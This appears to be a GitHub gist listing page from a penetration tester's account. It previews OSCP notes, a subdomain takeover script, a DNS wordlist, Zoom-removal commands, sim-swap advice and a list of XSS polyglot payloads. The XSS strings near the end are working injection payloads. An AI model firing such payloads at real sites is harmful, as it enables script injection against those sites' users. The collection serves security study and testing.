How to pass the OSCP
- Recon
- Find vuln
- Exploit
- Document it
Recon
Unicornscans in cli, nmap in msfconsole to help store loot in database.
wellr00t3d
wellr00t3d
/ how-to-oscp-final.md
Created
June 29, 2018 10:11
— forked from unfo/how-to-oscp-final.md
View how-to-oscp-final.md
wellr00t3d
/ gfid-resolver.sh
Created
October 2, 2018 09:50
— forked from louiszuckerman/gfid-resolver.sh
Glusterfs GFID Resolver Turns a GFID into a real path in the brick
View gfid-resolver.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ "$#" < "2" || "$#" > "3" ]]; then | |
| cat <<END | |
| Glusterfs GFID resolver -- turns a GFID into a real file path | |
| Usage: $0 <brick-path> <gfid> [-q] | |
| <brick-path> : the path to your glusterfs brick (required) | |
wellr00t3d
/ zoom_fix.md
Created
July 10, 2019 16:02
— forked from karanlyons/ZoomDaemon.yara
Fix for Unexpected Zoom Behavior
View zoom_fix.md
If you're using macOS, run these commands:
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file
wellr00t3d
/ second-order.py
Created
October 2, 2019 03:14
— forked from PatrikHudak/second-order.py
Second-order subdomain takeover
View second-order.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| # python3 | |
| from urllib.parse import urlparse | |
| import requests | |
| import urllib3 | |
| from bs4 import BeautifulSoup |
wellr00t3d
/ all.txt
Created
October 5, 2019 05:14
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
wellr00t3d
/ axiom_config.sh
Created
December 7, 2022 09:47
— forked from six2dez/axiom_config.sh
axiom_config.sh
View axiom_config.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet | |
| axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/' | |
| axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini | |
| axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini | |
| axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens | |
| axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf | |
| axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens |
wellr00t3d
/ sim-swap.md
Created
February 13, 2023 19:00
— forked from karllhughes/sim-swap.md
What to do if you get Sim-Swapped
View sim-swap.md
Here's how this attack works: https://www.google.com/amp/s/www.zdnet.com/google-amp/article/how-i-survived-a-sim-swap-attack-and-how-my-carrier-failed-me/
Immediate actions
- Make sure your primary email address has a secure recovery method and remove your old phone number from it.
- Gmail lets you set "Backup codes" that you can print off to recover your account.
- Change your email password and put it in a password manager.
- Remove any link to the old phone number from your email.
- If you're already locked out of your email, set up a "clean" email account. At this point, your old one is being accessed by hackers and can be used to reset any banking passwords.
- Store this new email password in a password manager.
wellr00t3d
/ xss-polyglots.txt
Last active
April 10, 2023 11:48
— forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
View xss-polyglots.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> | |
| javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
| javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> | |
| javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> | |
| javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` | |
| javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` | |
| javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> | |
| javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript>< |